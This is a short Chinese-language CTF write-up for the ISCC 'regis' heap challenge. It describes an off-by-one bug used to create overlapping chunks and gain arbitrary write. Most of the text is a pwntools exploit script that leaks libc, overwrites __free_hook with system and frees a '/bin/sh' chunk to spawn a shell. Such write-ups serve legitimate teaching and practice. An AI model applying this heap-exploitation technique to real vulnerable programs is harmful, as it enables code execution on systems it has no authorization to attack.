ISCC-regis复现

register

可以改got表

存在off_by_one漏洞

存在结构体

struct {
   int  size；
   char  * heapaddr；
 }user;

尝试修改heapaddr的值，便可以实现任意地址写

通过那个off-by-one漏洞来将一个块给扩大到那个0x20的那个大小，便可以构造堆重叠，然后edit那个chunk即可edit那个0x20的chunk，于是可以达到任意写的功能，将free_hook改为system即可，

exp如下：

# --------------------------exploit--------------------------
def exploit():
    li('exploit...')
    for i in range(0,2):
        add(0x10,"1")
    for i in range(0,1):
        delte(i)
    #存在一个chunk 2        0  1   
    add(0x58*2+8,"111111")
    #chunk 0 
    add(0x58*2+8,"111111")
    #chunk 3
    delte(0)
    add(0x58*2+8,"1111111")
    #chunk 0
    sla("Your choice :","3")
    sla("Index :",str(0))
    ru("1111111\n")
    libc_addr  = int(hex(uu64()),16)-0x3C4B78
    li("libc_addr -------> 0x%x"%libc_addr)
    ru("Done !")    
    one_gadget = libc_addr+0xf1247
    free_hook = libc_addr + libc.symbols["__free_hook"]
    system = libc_addr + libc.symbols["system"]


    add(0x58*2+8,"111111")
    #chunk 4 
    add(0x58*2+8,"111111")
    #chunk 5 
    edit(0,"/bin/sh\x0a\x00"+b"A"*(0x58*2-9)+p64(0x180)+b"\xe1")
    delte(2)
    read_plt = 0x000000000602020
    add(0x68*2+8,b"A"*(0x58*2+8)+p64(0x21)+p64(0x100)+p64(free_hook))
    db()
    sla("Your choice :","2")
    sla("Index :",str(3))
    sa("enter the username : ",p64(system))
    sla("Your choice :","4")
    sla("Index :",str(0))
def finish():
    ia()
    c()